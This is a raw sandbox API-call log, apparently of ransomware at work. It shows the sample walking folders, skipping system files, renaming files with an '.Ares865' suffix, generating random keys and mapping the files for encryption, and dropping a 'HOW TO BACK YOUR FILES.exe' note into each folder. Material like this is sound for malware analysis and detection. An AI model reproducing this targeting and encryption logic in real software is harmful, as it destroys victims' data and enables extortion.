[0089.315] lstrlenW (lpString="tmd") returned 3 [0089.315] lstrcmpiW (lpString1="ico", lpString2="tmd") returned -1 [0089.315] lstrlenW (lpString="tps") returned 3 [0089.315] lstrcmpiW (lpString1="ico", lpString2="tps") returned -1 [0089.315] lstrlenW (lpString="trc") returned 3 [0089.315] lstrcmpiW (lpString1="ico", lpString2="trc") returned -1 [0089.315] lstrlenW (lpString="trc") returned 3 [0089.315] lstrcmpiW (lpString1="ico", lpString2="trc") returned -1 [0089.315] lstrlenW (lpString="trm") returned 3 [0089.315] lstrcmpiW (lpString1="ico", lpString2="trm") returned -1 [0089.315] lstrlenW (lpString="udb") returned 3 [0089.315] lstrcmpiW (lpString1="ico", lpString2="udb") returned -1 [0089.315] lstrlenW (lpString="udl") returned 3 [0089.315] lstrcmpiW (lpString1="ico", lpString2="udl") returned -1 [0089.315] lstrlenW (lpString="usr") returned 3 [0089.315] lstrcmpiW (lpString1="ico", lpString2="usr") returned -1 [0089.315] lstrlenW (lpString="v12") returned 3 [0089.315] lstrcmpiW (lpString1="ico", lpString2="v12") returned -1 [0089.315] lstrlenW (lpString="vis") returned 3 [0089.315] lstrcmpiW (lpString1="ico", lpString2="vis") returned -1 [0089.315] lstrlenW (lpString="vpd") returned 3 [0089.315] lstrcmpiW (lpString1="ico", lpString2="vpd") returned -1 [0089.315] lstrlenW (lpString="vvv") returned 3 [0089.315] lstrcmpiW (lpString1="ico", lpString2="vvv") returned -1 [0089.315] lstrlenW (lpString="wdb") returned 3 [0089.315] lstrcmpiW (lpString1="ico", lpString2="wdb") returned -1 [0089.315] lstrlenW (lpString="wmdb") returned 4 [0089.315] lstrcmpiW (lpString1=".ico", lpString2="wmdb") returned -1 [0089.315] lstrlenW (lpString="wrk") returned 3 [0089.315] lstrcmpiW (lpString1="ico", lpString2="wrk") returned -1 [0089.315] lstrlenW (lpString="xdb") returned 3 [0089.315] lstrcmpiW (lpString1="ico", lpString2="xdb") returned -1 [0089.315] lstrlenW (lpString="xld") returned 3 [0089.315] lstrcmpiW (lpString1="ico", lpString2="xld") returned -1 [0089.315] lstrlenW (lpString="xmlff") returned 5 [0089.315] lstrcmpiW (lpString1="s.ico", lpString2="xmlff") returned -1 [0089.315] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico.Ares865") returned 111 [0089.316] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico.ares865"), dwFlags=0x1) returned 1 [0089.316] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0089.317] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=63682) returned 1 [0089.317] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0089.317] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0089.317] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0089.317] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0089.318] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0089.318] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.318] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xfbd0, lpName=0x0) returned 0x15c [0089.319] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xfbd0) returned 0x190000 [0089.323] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0089.324] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0089.324] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.324] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0089.324] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0089.324] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0089.324] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0089.324] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0089.324] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0089.324] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0089.324] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0089.324] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0089.324] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0089.324] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0089.325] CloseHandle (hObject=0x15c) returned 1 [0089.325] CloseHandle (hObject=0x118) returned 1 [0089.325] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0089.325] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0089.325] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0089.326] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f054512, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f054512, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x4c78c6c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x2f70, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tasks.xml.Ares865", cAlternateFileName="")) returned 1 [0089.326] lstrcmpiW (lpString1="tasks.xml.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.326] lstrcmpiW (lpString1="tasks.xml.Ares865", lpString2="aoldtz.exe") returned 1 [0089.326] lstrcmpiW (lpString1="tasks.xml.Ares865", lpString2=".") returned 1 [0089.326] lstrcmpiW (lpString1="tasks.xml.Ares865", lpString2="..") returned 1 [0089.326] lstrcmpiW (lpString1="tasks.xml.Ares865", lpString2="windows") returned -1 [0089.326] lstrcmpiW (lpString1="tasks.xml.Ares865", lpString2="bootmgr") returned 1 [0089.326] lstrcmpiW (lpString1="tasks.xml.Ares865", lpString2="temp") returned -1 [0089.326] lstrcmpiW (lpString1="tasks.xml.Ares865", lpString2="pagefile.sys") returned 1 [0089.326] lstrcmpiW (lpString1="tasks.xml.Ares865", lpString2="boot") returned 1 [0089.326] lstrcmpiW (lpString1="tasks.xml.Ares865", lpString2="ids.txt") returned 1 [0089.326] lstrcmpiW (lpString1="tasks.xml.Ares865", lpString2="ntuser.dat") returned 1 [0089.326] lstrcmpiW (lpString1="tasks.xml.Ares865", lpString2="perflogs") returned 1 [0089.326] lstrcmpiW (lpString1="tasks.xml.Ares865", lpString2="MSBuild") returned 1 [0089.326] lstrlenW (lpString="tasks.xml.Ares865") returned 17 [0089.326] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico") returned 103 [0089.326] lstrcpyW (in: lpString1=0x2cce4ac, lpString2="tasks.xml.Ares865" | out: lpString1="tasks.xml.Ares865") returned="tasks.xml.Ares865" [0089.326] lstrlenW (lpString="tasks.xml.Ares865") returned 17 [0089.326] lstrlenW (lpString="Ares865") returned 7 [0089.326] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0089.326] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f054512, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f054512, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x4c78c6c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x2f70, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tasks.xml.Ares865", cAlternateFileName="")) returned 0 [0089.326] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0089.326] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b70 [0089.326] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US" [0089.326] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2fc8 | out: hHeap=0x2b0000) returned 1 [0089.326] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0089.326] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US") returned 91 [0089.326] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US" [0089.326] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.327] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.327] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.327] GetLastError () returned 0x0 [0089.327] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.327] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.327] CloseHandle (hObject=0x120) returned 1 [0089.327] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.327] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.328] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x4c7b2820, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c7b2820, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0089.328] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.328] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.328] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.328] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x4c7b2820, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c7b2820, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.328] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.328] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0089.328] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0089.328] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.328] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c7b2820, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c7b2820, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0089.328] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0089.328] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2a152a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xb5e9110, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x4c7b2820, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x8f0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="resource.xml.Ares865", cAlternateFileName="")) returned 1 [0089.328] lstrcmpiW (lpString1="resource.xml.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.328] lstrcmpiW (lpString1="resource.xml.Ares865", lpString2="aoldtz.exe") returned 1 [0089.328] lstrcmpiW (lpString1="resource.xml.Ares865", lpString2=".") returned 1 [0089.328] lstrcmpiW (lpString1="resource.xml.Ares865", lpString2="..") returned 1 [0089.328] lstrcmpiW (lpString1="resource.xml.Ares865", lpString2="windows") returned -1 [0089.328] lstrcmpiW (lpString1="resource.xml.Ares865", lpString2="bootmgr") returned 1 [0089.328] lstrcmpiW (lpString1="resource.xml.Ares865", lpString2="temp") returned -1 [0089.328] lstrcmpiW (lpString1="resource.xml.Ares865", lpString2="pagefile.sys") returned 1 [0089.328] lstrcmpiW (lpString1="resource.xml.Ares865", lpString2="boot") returned 1 [0089.328] lstrcmpiW (lpString1="resource.xml.Ares865", lpString2="ids.txt") returned 1 [0089.328] lstrcmpiW (lpString1="resource.xml.Ares865", lpString2="ntuser.dat") returned 1 [0089.328] lstrcmpiW (lpString1="resource.xml.Ares865", lpString2="perflogs") returned 1 [0089.328] lstrcmpiW (lpString1="resource.xml.Ares865", lpString2="MSBuild") returned 1 [0089.328] lstrlenW (lpString="resource.xml.Ares865") returned 20 [0089.328] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*") returned 93 [0089.328] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="resource.xml.Ares865" | out: lpString1="resource.xml.Ares865") returned="resource.xml.Ares865" [0089.328] lstrlenW (lpString="resource.xml.Ares865") returned 20 [0089.328] lstrlenW (lpString="Ares865") returned 7 [0089.328] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0089.329] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2a152a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xb5e9110, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x4c7b2820, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x8f0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="resource.xml.Ares865", cAlternateFileName="")) returned 0 [0089.329] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0089.329] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b50 [0089.329] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}" [0089.329] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0089.329] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0089.329] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}") returned 85 [0089.329] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}" [0089.329] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.329] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.329] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.329] GetLastError () returned 0x0 [0089.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.330] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.330] CloseHandle (hObject=0x120) returned 1 [0089.330] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.330] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.330] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c7d8980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c7d8980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0089.330] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.330] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.330] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.330] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c7d8980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c7d8980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.330] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.330] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0089.330] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0089.330] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.330] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x4c7feae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c7feae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0089.330] lstrcmpiW (lpString1="en-US", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.330] lstrcmpiW (lpString1="en-US", lpString2="aoldtz.exe") returned 1 [0089.330] lstrcmpiW (lpString1="en-US", lpString2=".") returned 1 [0089.330] lstrcmpiW (lpString1="en-US", lpString2="..") returned 1 [0089.330] lstrcmpiW (lpString1="en-US", lpString2="windows") returned -1 [0089.330] lstrcmpiW (lpString1="en-US", lpString2="bootmgr") returned 1 [0089.330] lstrcmpiW (lpString1="en-US", lpString2="temp") returned -1 [0089.330] lstrcmpiW (lpString1="en-US", lpString2="pagefile.sys") returned -1 [0089.330] lstrcmpiW (lpString1="en-US", lpString2="boot") returned 1 [0089.330] lstrcmpiW (lpString1="en-US", lpString2="ids.txt") returned -1 [0089.330] lstrcmpiW (lpString1="en-US", lpString2="ntuser.dat") returned -1 [0089.330] lstrcmpiW (lpString1="en-US", lpString2="perflogs") returned -1 [0089.331] lstrcmpiW (lpString1="en-US", lpString2="MSBuild") returned -1 [0089.331] lstrlenW (lpString="en-US") returned 5 [0089.331] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*") returned 87 [0089.331] lstrcpyW (in: lpString1=0x2cce4ac, lpString2="en-US" | out: lpString1="en-US") returned="en-US" [0089.331] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b48 [0089.331] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb8) returned 0x2f2fc8 [0089.331] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b50 | out: ListHead=0x2e7710, ListEntry=0x2e7b50) returned 0x2e7b10 [0089.331] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2c7f9e6, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2c7f9e6, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x7c0e93d7, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xd0a3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0089.331] lstrcmpiW (lpString1="folder.ico", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.331] lstrcmpiW (lpString1="folder.ico", lpString2="aoldtz.exe") returned 1 [0089.331] lstrcmpiW (lpString1="folder.ico", lpString2=".") returned 1 [0089.331] lstrcmpiW (lpString1="folder.ico", lpString2="..") returned 1 [0089.331] lstrcmpiW (lpString1="folder.ico", lpString2="windows") returned -1 [0089.331] lstrcmpiW (lpString1="folder.ico", lpString2="bootmgr") returned 1 [0089.331] lstrcmpiW (lpString1="folder.ico", lpString2="temp") returned -1 [0089.331] lstrcmpiW (lpString1="folder.ico", lpString2="pagefile.sys") returned -1 [0089.331] lstrcmpiW (lpString1="folder.ico", lpString2="boot") returned 1 [0089.331] lstrcmpiW (lpString1="folder.ico", lpString2="ids.txt") returned -1 [0089.331] lstrcmpiW (lpString1="folder.ico", lpString2="ntuser.dat") returned -1 [0089.331] lstrcmpiW (lpString1="folder.ico", lpString2="perflogs") returned -1 [0089.331] lstrcmpiW (lpString1="folder.ico", lpString2="MSBuild") returned -1 [0089.331] lstrlenW (lpString="folder.ico") returned 10 [0089.331] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US") returned 91 [0089.331] lstrcpyW (in: lpString1=0x2cce4ac, lpString2="folder.ico" | out: lpString1="folder.ico") returned="folder.ico" [0089.331] lstrlenW (lpString="folder.ico") returned 10 [0089.331] lstrlenW (lpString="Ares865") returned 7 [0089.331] lstrcmpiW (lpString1="der.ico", lpString2="Ares865") returned 1 [0089.331] 